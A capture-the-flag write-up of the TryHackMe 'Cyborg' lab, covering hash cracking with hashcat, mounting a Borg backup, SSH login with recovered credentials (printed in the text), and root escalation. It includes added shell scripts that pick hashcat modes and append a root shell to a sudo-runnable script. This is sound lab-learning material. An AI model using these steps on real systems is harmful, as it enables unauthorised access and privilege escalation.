Today we are doing the CTF “Cyborg” on THM. This is an easy machine and includes “encrypted archives, source code analysis and more”. I did this once a while ago but wanted to post a write-up, since it is unusual in that it includes a third-party tool we have to learn if we expect to capture the flags.
We start off with a port scan with default scripts to take a peek. While that runs, I usually fuzz directories with gobuster. Right off the bat we have /admin and /etc directories that we’ll visit in just a moment…
The URL brings us to a default Apache index page, so checking /etc we see a squid directory which includes a config file and a password hash.
Checking out the /admin directory we are able to download an archive, but we also find an interesting message on the Admin Panel…
So we can assume the Squid proxy config might come into play later. After extracting the downloaded archive, we see there are some hints and a README file. Peeking at the README tells us the archive was created with Borg Backup. I have not had any experience with Borg, so I looked at the documentation on viewing archives. I installed it with apt install borgbackup, since I run a Debian derivative, and reviewed my options.
This took a bit of trial and error, but after moving into the dev directory inside the extracted archive, I am prompted for a passphrase to mount the repository. I took the mount command from the Borg documentation, since we do not know which files are in the archive but want all of them from the repo. We also have the hashed password for “music_archive” from the /etc directory, which we can crack.
First I tried to crack this hash as a regular MD5, but hash-identifier showed it is MD5(APR) instead (the Apache $apr1$ format, hashcat mode 1600). Changing the hash type in hashcat and running…we get the password!
After entering our password “squidward” to mount the Borg repo, we browse around. There is a user ‘Alex’ without a whole lot in his profile, but we do find a username:password combo of ‘alex:S3cretP@s3’. Since SSH was open, we can try these creds to connect to the machine and…it works! His user flag is in his home directory.
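The cracking step and the Borg mount, as an added example that is not part of this write-up: a shell helper that reads the hash format from the $id$ prefix (so a $apr1$ hash is never mistaken for raw MD5), emits the matching hashcat mode, and opens the repository non-interactively once the passphrase is known. The htpasswd line is constructed with placeholder salt and digest; the wordlist path, repo path and mountpoint are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up or the room): identify a crypt-style
# hash by its "$id$" prefix instead of guessing from length/charset, pick the
# matching hashcat mode, and open the Borg repo with the recovered passphrase.
# The sample htpasswd line below is constructed; its salt and digest are
# placeholders, not the real music_archive entry from the box.
set -u

# Map a hash to a hashcat mode. The $id$ prefix is authoritative for the
# crypt(3)-style formats; hash-identifier only guesses.
hashcat_mode() {
    case "$1" in
        '$apr1$'*)               echo 1600; return ;;  # Apache APR1, "MD5(APR)"
        '$1$'*)                  echo 500;  return ;;  # md5crypt
        '$5$'*)                  echo 7400; return ;;  # sha256crypt
        '$6$'*)                  echo 1800; return ;;  # sha512crypt
        '$2a$'*|'$2b$'*|'$2y$'*) echo 3200; return ;;  # bcrypt
    esac
    # No prefix: a bare 32-hex string is only a raw-MD5 *guess* (mode 0).
    # NTLM and other unsalted digests have the same shape, which is exactly
    # why "just try it as plain MD5" is the wrong reflex for an $apr1$ hash.
    if [ "${#1}" -eq 32 ] && printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]{32}$'; then
        echo 0
    else
        echo unknown
    fi
}

# "user:hash" is the htpasswd layout used by Squid's basic-auth password file.
htpasswd_user() { printf '%s\n' "${1%%:*}"; }
htpasswd_hash() { printf '%s\n' "${1#*:}"; }

# Build the hashcat command line for one htpasswd entry.
# $1 = "user:hash" line, $2 = wordlist path (assumed to exist on your box).
hashcat_cmd() {
    local user hash mode
    user=$(htpasswd_user "$1")
    hash=$(htpasswd_hash "$1")
    mode=$(hashcat_mode "$hash")
    [ "$mode" != unknown ] || { echo "unrecognised hash format: $hash" >&2; return 1; }
    printf 'hashcat -m %s %s.hash %s\n' "$mode" "$user" "$2"
}

# With the passphrase known, list the archives and mount all of them.
# BORG_PASSPHRASE replaces the interactive prompt; detach with "borg umount".
# $1 = repo path (assumed), $2 = passphrase, $3 = empty mountpoint (assumed).
borg_open() {
    command -v borg >/dev/null 2>&1 || { echo "borg not installed" >&2; return 1; }
    mkdir -p "$3"
    BORG_PASSPHRASE="$2" borg list "$1" &&
    BORG_PASSPHRASE="$2" borg mount "$1" "$3"
}

# Constructed sample line: the real hash from the box is not reproduced here.
SAMPLE='music_archive:$apr1$saltsalt$PLACEHOLDERxxxxxxxxxxxx'
hashcat_cmd "$SAMPLE" /usr/share/wordlists/rockyou.txt
# borg_open ./repo squidward /mnt/borg   # once the crack has succeeded
```

borg mount needs FUSE support on the attacking box; if that is missing, borg extract into a scratch directory (borg extract REPO::ARCHIVE, with the archive name taken from borg list) gets you the same files without a mountpoint.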
Now we need to escalate privileges. Here I check cron jobs, binaries with the SUID bit set, and the user’s sudo permissions. We find something interesting: Alex is able to run backup.sh as root without a password. If we can get that script to spawn a shell as root, we will be set.
Unfortunately we don’t have permission to modify the file as is. But Alex is able to use chmod on it (only the file’s owner can do that), which lets us make it writable and append a shell spawn at the bottom of the script!
Then it’s as simple as running the script with sudo and moving to the root directory to grab the root flag!
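The privilege-escalation step, as an added example that is not the author’s own commands: a small shell helper that works out whether a script named in a NOPASSWD sudo rule can be altered (directly, via chmod because we own it, or by replacing it in a writable directory) and then appends the shell spawn. The backup.sh path is a placeholder.

```shell
#!/usr/bin/env bash
# Added example (not from the write-up): before abusing a NOPASSWD sudo entry
# that runs a script, establish *why* the script can be altered. Three cases
# matter in practice: the file is directly writable; we own it, so chmod can
# make it writable (the situation on this box); or the parent directory is
# writable, so the whole file can be swapped out. The script path is a placeholder.
set -u

# Report one of: writable | owned | dir-writable | locked
sudo_script_status() {
    local f=$1
    if [ -w "$f" ]; then
        echo writable
    elif [ -O "$f" ]; then
        echo owned          # not writable now, but chmod u+w works for the owner
    elif [ -w "$(dirname "$f")" ]; then
        echo dir-writable   # rename/replace the whole file instead of editing it
    else
        echo locked
    fi
}

# Make the script writable if we can, then append a shell spawn as the last
# line. Because sudo runs the script as root, a plain /bin/bash at the end
# inherits that root context; no SUID tricks (bash -p) are needed.
plant_shell() {
    local f=$1
    case "$(sudo_script_status "$f")" in
        writable) ;;
        owned)    chmod u+w "$f" ;;
        *)        echo "cannot modify $f" >&2; return 1 ;;
    esac
    printf '\n/bin/bash -i\n' >> "$f"
}

# Usage on the target (path assumed; take the real one from "sudo -l" output):
#   sudo -l
#   sudo_script_status /path/to/backup.sh
#   plant_shell /path/to/backup.sh && sudo /path/to/backup.sh
```

If the status comes back dir-writable rather than owned, editing is the wrong move: rename the original and drop a replacement script with the same name, since sudo resolves the path, not the inode.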
Thank you all for reading!